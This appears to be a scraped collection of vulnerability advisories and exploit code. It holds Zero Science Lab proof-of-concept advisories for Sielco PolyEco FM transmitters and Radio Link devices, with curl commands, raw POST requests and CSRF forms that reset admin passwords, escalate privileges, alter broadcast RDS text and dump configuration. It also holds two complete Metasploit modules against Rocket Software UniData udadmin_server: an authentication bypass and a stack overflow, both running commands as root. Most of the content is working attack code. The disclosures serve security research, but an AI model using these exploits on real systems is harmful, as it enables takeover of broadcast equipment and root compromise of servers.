<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Account Takeover / Lockout / EoP<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: The application suffers from an authentication bypass,<br />account takeover/lockout and elevation of privileges vulnerability<br />that can be triggered by directly calling the users object and<br />effectively modifying the password of the two constants user/role<br />(user/admin). This can be exploited by an unauthenticated adversary<br />by issuing a single POST request to the vulnerable endpoint and<br />gain unauthorized access to the affected device with administrative<br />privileges.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5765<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5765.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br /># Change admin pwd<br />$ curl -X POST -F "pwd_admin=t00t" -F "pwd_user=" http://RADIOFM/protect/users.htm<br /></code></pre>
<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information Disclosure<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: Sielco PolyEco is affected by an information disclosure<br />vulnerability due to improper access control enforcement. An<br />unauthenticated remote attacker can exploit this, via a specially<br />crafted request to gain access to sensitive information.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5766<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br />$ curl -s http://RADIOFM/factory.ssi<br />$ curl -s http://RADIOFM/rds.ssi<br />$ curl -s http://RADIOFM/ip.ssi<br />$ curl -s http://RADIOFM/alarm.ssi<br />$ curl -s http://RADIOFM/i2s.ssi<br />$ curl -s http://RADIOFM/time.ssi<br />$ curl -s http://RADIOFM/fft.ssi<br />$ curl -s http://RADIOFM/info.ssi<br />$ curl -s http://RADIOFM/status.ssi<br />$ curl -s http://RADIOFM/statusx.ssi<br />$ curl -s http://RADIOFM/audio.ssi<br />$ curl -s http://RADIOFM/smtp.ssi<br />$ curl -s http://RADIOFM/rf.ssi<br />$ curl -s http://RADIOFM/rfa.ssi<br />$ curl -s http://RADIOFM/ping.ssi<br />$ curl -s http://RADIOFM/lan.ssi<br />$ curl -s http://RADIOFM/kappa.ssi<br />$ curl -s http://RADIOFM/dbrt.ssi<br />$ curl -s http://RADIOFM/audiom.ssi<br />$ curl -s http://RADIOFM/log.ssi<br /></code></pre>
<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Radio Data System POST Manipulation<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: Improper access control occurs when the application provides<br />direct access to objects based on user-supplied input. As a result<br />of this vulnerability attackers can bypass authorization and access<br />resources behind protected pages. The application interface allows<br />users to perform certain actions via HTTP requests without performing<br />any validity checks to verify the requests. This can be exploited<br />to perform certain actions and manipulate the RDS text display.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5767<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5767.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br />POST /protect/rds.htm HTTP/1.1<br />Host: RADIOFM<br /><br />rds_inta=1<br />rds_intb=0<br />rds_pi=381<br />rds_ps=ZSL<br />rds_rta=www.zeroscience.mk<br />rds_rtb<br />rds_rtt=0<br />rds_tp=0<br />rds_tp=1<br />rds_ta=0<br />rds_ms=0<br />rds_pty=4<br />rds_ptyn= <br />rds_ecc=00<br />rds_ct=0<br />rds_level=90<br />rds_psd=0<br />rds_psd1<br />rds_pst1=0<br />rds_psd5<br />rds_pst5=0<br />rds_psd2<br />rds_pst2=0<br />rds_psd6<br />rds_pst6=0<br />rds_psd3<br />rds_pst3=0<br />rds_psd7<br />rds_pst7=0<br />rds_psd4<br />rds_pst4=0<br />rds_psd8<br />rds_pst8=0<br />rds_di_pty=0<br />rds_di_cmp=0<br />rds_di_cmp=1<br />rds_di_st=0<br />rds_di_art=0<br />rds_di_art=1<br />a0=90<br />a1=9<br />a2=26<br />a3=115<br />a4=0<br />a5=0<br />a6=0<br />a7=0<br />a8=0<br />a9=0<br />a10=0<br />a11=0<br />a12=0<br />a13=0<br />a14=0<br />a15=0<br />a16=0<br />a17=0<br />a18=0<br />a19=0<br />a20=0<br />a21=0<br />a22=0<br />a23=0<br />a24=0<br /></code></pre>
<pre><code><br />Sielco PolyEco Digital FM Transmitter 2.0.6 Authorization Bypass Factory Reset<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19<br /> PolyEco1000 CPU:1.9.4 FPGA:10.19<br /> PolyEco1000 CPU:1.9.3 FPGA:10.19<br /> PolyEco500 CPU:1.7.0 FPGA:10.16<br /> PolyEco300 CPU:2.0.2 FPGA:10.19<br /> PolyEco300 CPU:2.0.0 FPGA:10.19<br /><br />Summary: PolyEco is the innovative family of high-end digital<br />FM transmitters of Sielco. They are especially suited as high<br />performance power system exciters or compact low-mid power<br />transmitters. The same cabinet may in fact be fitted with 50,<br />100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,<br />1000).<br /><br />All features can be controlled via the large touch-screen display<br />4.3" or remotely. Many advanced features are inside by default<br />in the basic version such as: stereo and RDS encoder, audio<br />change-over, remote-control via LAN and SNMP, "FFT" spectral<br />analysis of the audio sources, SFN synchronization and much more.<br /><br />Desc: Improper access control occurs when the application provides<br />direct access to objects based on user-supplied input. As a result<br />of this vulnerability attackers can bypass authorization and access<br />resources behind protected pages.<br /><br />Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br />Macedonian Information Security Research and Development Laboratory<br />Zero Science Lab - https://www.zeroscience.mk - @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5768<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5768.php<br /><br /><br />26.01.2023<br /><br />--<br /><br /><br />index.htm:<br />----------<br />54: function dologin() {<br />55: var hash = hex_md5($('#password').val() + id);<br />56: $.get('/login.cgi', {<br />57: user: $('#user').val(),<br />58: password: hash,<br />59: id: id<br />60: }).done(function (data) {<br />61: var dati = $.parseXML(data);<br />62: id = $(dati).find('id').text();<br />63: user = $(dati).find('u').text();<br />64: if (id == 0)<br />65: window.location.href = '/index.htm';<br />66: else {<br />67: scriviCookie('polyeco', id, 180);<br />68: if (user >= 3)<br />69: window.location.href = '/protect/factory.htm';<br />70: else<br />71: window.location.href = '/protect/index.htm';<br />72: }<br />73: });<br />74: }<br /><br /><br />The function 'dologin()' in index.htm is called when a user submits a login form.<br />It starts by calculating a hash of the user-entered password and a variable 'id'<br />using the hex_md5 function. Then it makes an HTTP GET request to the 'login.cgi'<br />endpoint with the user's entered username, the calculated password hash and the<br />'id' variable as parameters. If the request is successful, the function parses the<br />XML data returned from the server, extracting the values of the 'id' and 'u' elements.<br />Then it checks the value of the 'id' variable, if it's equal to 0 then it redirects<br />the user to '/index.htm', otherwise, it writes a cookie called 'polyeco' with the<br />value of 'id' and expires after 180 days.<br /><br />After that it checks the value of the 'user' variable, if it's greater than or equal<br />to 3, it redirects the user to '/protect/factory.htm', otherwise it redirects the<br />user to '/protect/index.htm'. An attacker can exploit this by modifying the client-side<br />JavaScript to always set the 'user' variable to a high value (4), or by tampering with<br />the data sent to the server during the login process to change the value of the 'user'<br />variable. It also works if the server's response variable 'user' is modified.<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::Unirpc<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rocket Software Unidata udadmin_server Authentication Bypass',<br /> 'Description' => %q{<br /> This module exploits an authentication bypass vulnerability in the<br /> Linux version of udadmin_server, which is an RPC service that comes<br /> with the Rocket Software UniData server. This affects versions of<br /> UniData prior to 8.2.4 build 3003.<br /><br /> This service typically runs as root. It accepts a username of<br /> ":local:" and a password in the form of "<username>:<uid>:<gid>",<br /> where username and uid must be a valid account, but gid can be<br /> anything except 0.<br /><br /> This exploit takes advantage of this login account to authenticate<br /> as a chosen user and run an arbitrary command (using the built-in<br /> OsCommand message).<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ron Bowes', # Discovery, PoC, module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed' ],<br /> [ 'CVE', '2023-28503' ],<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'RPORT' => 31438,<br /> 'PrependFork' => true<br /> },<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-03-30',<br /> 'Notes' => {<br /> 'SideEffects' => [],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'Stability' => [CRASH_SAFE]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('UNIRPC_USERNAME', [ true, 'Linux username to authenticate with (must match the uid)', 'root']),<br /> OptInt.new('UNIRPC_UID', [ true, 'Linux uid to authenticate with (must correspond to the username)', 0]),<br /> OptInt.new('UNIRPC_GID', [ true, 'gid to authenticate with (must not be 0, does not need to correspond to the username)', 1000]),<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('UNIRPC_ENDPOINT', [ true, 'The UniRPC service to request', 'udadmin']),<br /> ]<br /> )<br /> end<br /><br /> # We can detect UniRPC by performing a version check, but the version number<br /> # didn't increment in the patch (only the build number did, which AFAICT we<br /> # can't access), so just do a sanity check<br /> def check<br /> version = unirpc_get_version<br /> vprint_status("Detected UniRPC version #{version} is running")<br /><br /> Exploit::CheckCode::Detected<br /> rescue UniRPCCommunicationError => e<br /> return CheckCode::Safe("Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> return CheckCode::Safe("UniRPC server returned something unexpected: #{e}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> vprint_status('Sending OsCommand request')<br /> sock.put(build_unirpc_message(args: [<br /> # Message type<br /> { type: :integer, value: UNIRPC_MESSAGE_OSCOMMAND },<br /> { type: :string, value: cmd },<br /> ]))<br /> end<br /><br /> def exploit<br /> # Sanity check<br /> if datastore['UNIRPC_GID'] == 0<br /> fail_with(Failure::BadConfig, 'UNIRPC_GID cannot be 0')<br /> end<br /><br /> # Connect to the service<br /> connect<br /><br /> # Connect to the RPC service (probably "udadmin")<br /> vprint_status("Connecting to UniRPC endpoint #{datastore['UNIRPC_ENDPOINT']}")<br /> sock.put(build_unirpc_message(args: [<br /> # Service name<br /> { type: :string, value: datastore['UNIRPC_ENDPOINT'] },<br /><br /> # "Secure" flag - this must be non-zero if the server is started in<br /> # "secure" mode (-s)<br /> { type: :integer, value: 1 },<br /> ]))<br /><br /> # This will throw an error if the login fails, otherwise we can discard the<br /> # result<br /> recv_unirpc_message(sock, first_result_is_status: true)<br /><br /> # Prepare the authentication bypass<br /> username = ':local:'<br /> password = "#{datastore['UNIRPC_USERNAME']}:#{datastore['UNIRPC_UID']}:#{datastore['UNIRPC_GID']}"<br /> vprint_status("Authenticating to RPC service as #{username} / #{password}")<br /><br /> # Send the authentication message<br /> sock.put(build_unirpc_message(args: [<br /> # Message type<br /> { type: :integer, value: UNIRPC_MESSAGE_LOGIN },<br /><br /> # Username<br /> # ":local:" is a special value that skips login<br /> { type: :string, value: username },<br /><br /> # Password (encoded by making each byte negative)<br /> # I think if username is :local:, this is username:uid:gid (gid can't be 0)<br /> { type: :string, value: password.bytes.map { |b| (0x0FF & (~b)).chr }.join },<br /> ]))<br /><br /> # Once again, we only care if this fails - if the status is an error<br /> recv_unirpc_message(sock, first_result_is_status: true)<br /><br /> # Run the command(s)<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> rescue UniRPCCommunicationError => e<br /> fail_with(Failure::Unreachable, "Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> fail_with(Failure::UnexpectedReply, "UniRPC server returned something unexpected: #{e}")<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = GoodRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::Remote::Unirpc<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> OFFSETS = {<br /> '8.2.4' => {<br /> # The amount of padding required to overwrite the return addr<br /> 'offset' => 0x2b8,<br /><br /> # This returns to "mov rdi, rsp / call system", which means the<br /> # remainder of what's on the stack will be passed to system()<br /> 'return_address' => 0x412e25<br /> }<br /> }<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rocket Software Unidata udadmin_server Stack Buffer Overflow in Password',<br /> 'Description' => %q{<br /> This modlue exploits an authentication bypass vulnerability in the<br /> Linux version of udadmin_server, which is an RPC service that comes<br /> with the Rocket Software UniData server, which runs as root.<br /><br /> This vulnerability affects UniData versions 8.2.4 build 3003 and<br /> earlier (for Linux), but this module specifically targets UniData<br /> version 8.2.4 build 3001. Other versions will crash the forked<br /> process, but will not otherwise affect the RPC server.<br /><br /> The username and password fields are copied to a stack-based buffer<br /> using a function that's equivalent to strcpy() (ie, has no bounds<br /> checking). Additionally, the password field is encoded in such a way<br /> that we can include NUL bytes.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'Ron Bowes', # Discovery, PoC, module<br /> ],<br /> 'References' => [<br /> [ 'URL', 'https://www.rapid7.com/blog/post/2023/03/29/multiple-vulnerabilities-in-rocket-software-unirpc-server-fixed' ],<br /> [ 'CVE', '2023-28502' ],<br /> ],<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],<br /> 'DefaultOptions' => {<br /> 'RPORT' => 31438,<br /> 'PrependFork' => true<br /> },<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> # Used for auto-selection<br /> 'Version' => '8.2.4',<br /><br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'Privileged' => true,<br /> 'DisclosureDate' => '2023-03-30',<br /> 'Notes' => {<br /> 'SideEffects' => [],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'Stability' => [CRASH_SERVICE_RESTARTS] # The forked process can crash<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptBool.new('EXIT_CLEANLY', [ true, 'If set, tries to kill the parent process with SIGTERM before it crashes', true]),<br /> OptEnum.new('UNIDATA_VERSION', [true, 'The version of UniData target. Automatic detection is the default.', 'auto', ['auto', '8.2.4'] ]),<br /> ]<br /> )<br /><br /> register_advanced_options(<br /> [<br /> OptString.new('UNIRPC_ENDPOINT', [ true, 'The UniRPC service to request', 'udadmin']),<br /> ]<br /> )<br /> end<br /><br /> # We can detect UniRPC by performing a version check, but the version number<br /> # didn't increment in the patch (only the build number did, which AFAICT we<br /> # can't access), so just do a sanity check<br /> def check<br /> @version = unirpc_get_version<br /> vprint_status("Detected UniRPC version #{@version} is running")<br /><br /> Exploit::CheckCode::Detected<br /> rescue UniRPCCommunicationError => e<br /> return CheckCode::Safe("Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> return CheckCode::Safe("UniRPC server returned something unexpected: #{e}")<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # Connect to the service and authenticate before running the command stager<br /> connect<br /><br /> # Connect to the RPC service (probably "udadmin")<br /> vprint_status("Connecting to UniRPC endpoint #{datastore['UNIRPC_ENDPOINT']}")<br /> sock.put(build_unirpc_message(args: [<br /> # Service name<br /> { type: :string, value: datastore['UNIRPC_ENDPOINT'] },<br /><br /> # "Secure" flag - this must be non-zero if the server is started in<br /> # "secure" mode (-s)<br /> { type: :integer, value: 1 },<br /> ]))<br /> recv_unirpc_message(sock, first_result_is_status: true)<br /><br /> # Pick a random username<br /> username = rand_text_alpha(6..20)<br /><br /> # Start the password with random junk that writes to the stack<br /> password = rand_text_alpha(@offsets['offset'])<br /><br /> # Append the return address<br /> password += [@offsets['return_address']].pack('Q')<br /><br /> # Attempt to cleanly kill the parent process if we can (otherwise it<br /> # crashes)<br /> #<br /> # Because of how the payload goes onto the stack immediately after the<br /> # return address, we can't return into an `exit` call - all the parent<br /> # process can do is crash (which is logged).<br /> #<br /> # We CAN, however, prepend a command to cleanly kill the parent PID, making<br /> # it look like a standard exit (not logged).<br /> if datastore['EXIT_CLEANLY']<br /> password += 'kill -TERM $PPID & '<br /> end<br /><br /> # End with the command, which will be passed to system()<br /> password += cmd<br /><br /> # Check if the payload includes the `\xff` character, which will terminate<br /> # the string and break the module. This shouldn't ever appear in the actual<br /> # payload, which is base64-encoded, but this will catch a future return<br /> # address that would break the payload<br /> if password.include?("\xff")<br /> fail_with(Failure::BadConfig, 'Payload contains a 0xFF character, which will fail')<br /> end<br /><br /> vprint_status("Authenticating to RPC service as #{username} with a stack-overflowing password")<br /> sock.put(build_unirpc_message(args: [<br /> # Message type<br /> { type: :integer, value: UNIRPC_MESSAGE_LOGIN },<br /><br /> # Username<br /> { type: :string, value: username },<br /><br /> # Password (encoded by making each byte negative)<br /> { type: :string, value: password.bytes.map { |b| (0x0FF & (~b)).chr }.join },<br /> ]))<br /><br /> print_status('Payload sent')<br /> end<br /><br /> def exploit<br /> if datastore['UNIDATA_VERSION'] == 'auto'<br /> if @version.nil?<br /> vprint_status('Requesting the version number for automatic targeting...')<br /> @version = unirpc_get_version<br /> else<br /> vprint_status("Using the version number from earlier for targeting: #{@version}")<br /> end<br /> else<br /> @version = datastore['UNIDATA_VERSION']<br /> vprint_status("Using the version number from UNIDATA_VERSION for targeting: #{@version}")<br /> end<br /><br /> @offsets = OFFSETS[@version]<br /> if @offsets.nil?<br /> fail_with(Failure::NoTarget, "No matching target for version #{@version}")<br /> end<br /><br /> # Run the command(s)<br /> case target['Type']<br /> when :unix_cmd<br /> execute_command(payload.encoded)<br /> when :linux_dropper<br /> execute_cmdstager<br /> end<br /> rescue UniRPCCommunicationError => e<br /> fail_with(Failure::Unreachable, "Could not communicate with the UniRPC server: #{e}")<br /> rescue UniRPCUnexpectedResponseError => e<br /> fail_with(Failure::UnexpectedReply, "UniRPC server returned something unexpected: #{e}")<br /> end<br />end<br /></code></pre>
<pre><code><!--<br /><br /><br />Sielco Radio Link 2.06 Remote Privilege Escalation<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all transmission<br />and reception needs, thanks to innovative units and excellent performances,<br />accompanied by a high reliability and low consumption.<br /><br />Desc: The application suffers from a privilege escalation vulnerability.<br />A user with Read permissions can elevate his/her privileges by sending<br />a HTTP POST request setting the parameter 'auth1' or 'auth2' or 'auth3'<br />to integer value '1' for Write or '2' for Admin permissions.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5759<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5759.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://radiolink/protect/users_rx.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="" /><br /> <input type="hidden" name="pwd0bis" value="" /><br /> <input type="hidden" name="user1" value="testingus" /><br /> <input type="hidden" name="pwd1" value="" /><br /> <input type="hidden" name="pwd1bis" value="" /><br /> <input type="hidden" name="auth1" value="2" /><br /> <input type="hidden" name="user2" value="" /><br /> <input type="hidden" name="pwd2" value="" /><br /> <input type="hidden" name="pwd2bis" value="" /><br /> <input type="hidden" name="auth2" value="0" /><br /> <input type="hidden" name="user3" value="" /><br /> <input type="hidden" name="pwd3" value="" /><br /> <input type="hidden" name="pwd3bis" value="" /><br /> <input type="hidden" name="auth3" value="0" /><br /> <input type="submit" value="Escalate" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code><!--<br /><br /><br />Sielco Radio Link 2.06 Improper Access Control Change Admin Password<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all transmission<br />and reception needs, thanks to innovative units and excellent performances,<br />accompanied by a high reliability and low consumption.<br /><br />Desc: The application suffers from improper access control when editing<br />users. A user with Read permissions can manipulate users, passwords and<br />permissions by sending a single HTTP POST request with modified parameters<br />and edit other users' names, passwords and permissions including admin<br />password.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5760<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5760.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br /><html><br /> <body><br /> <form action="http://radiolink/protect/users_rx.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="Ch4nged12" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="pwd0bis" value="Ch4nged12" /> <!-- This will set/modify admin pwd --><br /> <input type="hidden" name="user1" value="" /> <!-- This will set/modify user1 --><br /> <input type="hidden" name="pwd1" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="pwd1bis" value="" /> <!-- This will set/modify user1 pwd --><br /> <input type="hidden" name="auth1" value="0" /> <!-- This will set user1 read perm --><br /> <input type="hidden" name="user2" value="" /> <!-- This will set/modify user2 --><br /> <input type="hidden" name="pwd2" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="pwd2bis" value="" /> <!-- This will set/modify user2 pwd --><br /> <input type="hidden" name="auth2" value="0" /> <!-- This will set user2 read perm --><br /> <input type="hidden" name="user3" value="" /> <!-- This will set/modify user3 --><br /> <input type="hidden" name="pwd3" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="pwd3bis" value="" /> <!-- This will set/modify user3 pwd --><br /> <input type="hidden" name="auth3" value="0" /> <!-- This will set user3 read perm --><br /> <input type="submit" value="Modify admin pwd, delete all users" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code><!--<br /><br /><br />Sielco Radio Link 2.06 Cross-Site Request Forgery (Add Admin)<br /><br /><br />Vendor: Sielco S.r.l<br />Product web page: https://www.sielco.org<br />Affected version: 2.06 (RTX19)<br /> 2.05 (RTX19)<br /> 2.00 (EXC19)<br /> 1.60 (RTX19)<br /> 1.59 (RTX19)<br /> 1.55 (EXC19)<br /><br />Summary: Sielco develops and produces radio links for all<br />transmission and reception needs, thanks to innovative units<br />and excellent performances, accompanied by a high reliability<br />and low consumption.<br /><br />Desc: The application interface allows users to perform certain<br />actions via HTTP requests without performing any validity checks<br />to verify the requests. This can be exploited to perform certain<br />actions with administrative privileges if a logged-in user visits<br />a malicious web site.<br /><br />Tested on: lwIP/2.1.1<br /> Web/2.9.3<br /><br /><br />Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /> @zeroscience<br /><br /><br />Advisory ID: ZSL-2023-5761<br />Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5761.php<br /><br /><br />26.01.2023<br /><br />--><br /><br /><br />CSRF Add Admin:<br />---------------<br /><br /><html><br /> <body><br /> <form action="http://radiolink/protect/users_rx.htm" method="POST"><br /> <input type="hidden" name="pwd0" value="" /><br /> <input type="hidden" name="pwd0bis" value="" /><br /> <input type="hidden" name="user1" value="Reader" /><br /> <input type="hidden" name="pwd1" value="123456" /><br /> <input type="hidden" name="pwd1bis" value="123456" /><br /> <input type="hidden" name="auth1" value="2" /><br /> <input type="hidden" name="user2" value="" /><br /> <input type="hidden" name="pwd2" value="" /><br /> <input type="hidden" name="pwd2bis" value="" /><br /> <input type="hidden" name="auth2" value="0" /><br /> <input type="hidden" name="user3" value="" /><br /> <input type="hidden" name="pwd3" value="" /><br /> <input type="hidden" name="pwd3bis" value="" /><br /> <input type="hidden" name="auth3" value="0" /><br /> <input type="submit" value="Adminize Me!" /><br /> </form><br /> </body><br /></html><br /></code></pre>
